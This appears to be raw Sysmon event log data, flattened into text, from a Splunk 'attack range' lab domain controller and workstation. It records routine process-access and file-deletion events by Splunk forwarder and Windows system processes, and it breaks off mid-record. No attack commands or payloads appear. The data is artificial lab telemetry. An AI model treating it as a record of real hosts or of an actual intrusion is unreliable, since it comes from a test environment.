23542300x8000000000000000224151Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:45.286{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3179DE2A80EBF0920FDACB3221884534,SHA256=531DA225821C64680DF47BFAA189C173A9EF8EC5E58A1CB9B1060F1ABFCB7F8E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000224150Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:45.223{4F8D34B0-1B5C-6216-8005-000000003902}6042772C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000224168Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:46.957{4F8D34B0-F11D-6215-2300-000000003902}2036NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=C796F5788518CF0F57AB5C87207C5D14,SHA256=0CE7095FECB35749AB15D15586D728EDDAEC94009FC3FB4FCEDC790B064FF951,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000224167Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:46.739{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1B5E-6216-8105-000000003902}3568C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000224166Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:46.739{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000224165Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:46.739{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000224164Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:46.739{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000224163Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:46.739{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000224162Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:46.739{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000224161Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:46.739{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000224160Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:46.739{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000224159Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:46.739{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000224158Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:46.739{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000224157Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:46.739{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-1B5E-6216-8105-000000003902}3568C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000224156Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:46.739{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1B5E-6216-8105-000000003902}3568C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000224155Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:46.739{4F8D34B0-1B5E-6216-8105-000000003902}3568C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000224154Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:46.598{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7C2802423FC6EE2EB7B73A22BCD9B522,SHA256=AE8857DCA37BBF5CCB92CABBBBC33C7CB71FEAC6A161FA810B722381C1A7C700,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000300421Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:46.556{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0857B0DA2A12238688978D95178B991E,SHA256=9168CD69869CE4DA7DC4E9402712115E5C6285840F2BA0AAE1DFABA2AC07BB30,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000300420Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:46.540{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4F9D791C6C469F36EFCFF450F5200ED3,SHA256=8D37CEA28069C321FBA3817A7CBFF4B29CD173F4F6C3D44F662B34D07F2BA57F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000300419Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:46.540{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2FA507E2D8888FD95CE7F702BF2F10CC,SHA256=69137658B1095C1D9B87F7FE5165FD14A53EA82B211D08D770C8E10986997764,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000300418Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:46.456{C8EA50B7-F11D-6215-0B00-000000003802}6286044C:\Windows\system32\lsass.exe{C8EA50B7-F11F-6215-1000-000000003802}364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000300417Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:46.456{C8EA50B7-F11F-6215-1000-000000003802}364NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Windows\security\audit\audit.csvMD5=DDF0C2622258DF5AE8CB415CDCD08019,SHA256=8D6A5261E229A9B08573C28F549FA17C3A3F874B54F56CF5CC5C177B05CC6774,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000300416Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:46.356{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-F118-6215-0100-000000003802}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+97022|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+1443f|C:\Windows\system32\lsasrv.dll+2f1f1|C:\Windows\system32\lsasrv.dll+2d0d6|C:\Windows\system32\lsasrv.dll+32919|C:\Windows\system32\lsasrv.dll+30267|C:\Windows\system32\lsasrv.dll+2f1f1|C:\Windows\system32\lsasrv.dll+1752d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e 10341000x8000000000000000300415Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:46.256{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-F11F-6215-1000-000000003802}364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300414Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:46.240{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-F11F-6215-1000-000000003802}364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000224187Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:47.879{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FEEF2AEEDD97FB39A8FA0B70D0E09051,SHA256=FBF74FF230E2282F5A3CF0259CF7C5374B686B8F35B2431696D0D42ADA374066,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000224186Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:47.879{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BD51A20DECCD84BC2C37E4A93D3674DF,SHA256=369CA95563131286FB164B2C03D8FFCDE3915FDEE2A1093864122C27AED5DB5C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000300428Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:47.571{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=42E80DCDA63D606FBD18CFCAF0CF5EE9,SHA256=631DB697A0A83EE1EA9F71DF8A8593DE65747E231E66311D29AA391A51D1E74A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000224185Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:47.552{4F8D34B0-1B5F-6216-8205-000000003902}10082652C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000224184Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:47.271{4F8D34B0-F11D-6215-2300-000000003902}2036NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\fishbucket\splunk_private_db\snapshot.old\snap.datMD5=4792EDE16CA4F1CF5B1793243454DB30,SHA256=12320DC054AD85ECB4122F66794BA6612CE0BAE6384FCBC9A3DB4D07ACE8805E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000224183Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:47.271{4F8D34B0-F11D-6215-2300-000000003902}2036NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\fishbucket\splunk_private_db\snapshot.old\btree_records.datMD5=2D905006C9CE35C08D069CDC361AE2AB,SHA256=E0FF04151A9C8954C87D0406A9256E97085C9FB0123A9A693D84C1E68A424865,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000224182Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:47.271{4F8D34B0-F11D-6215-2300-000000003902}2036NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\fishbucket\splunk_private_db\snapshot.old\btree_index.datMD5=CA7A7E1B4B4316B6EED0B7AD89AEE7E5,SHA256=3BB2A6F3F8320B518C3697289E3AEE3FDB4BF8AC8CA9B95B4C5C21C4CC23A685,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000224181Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:47.239{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1B5F-6216-8205-000000003902}1008C:\Program 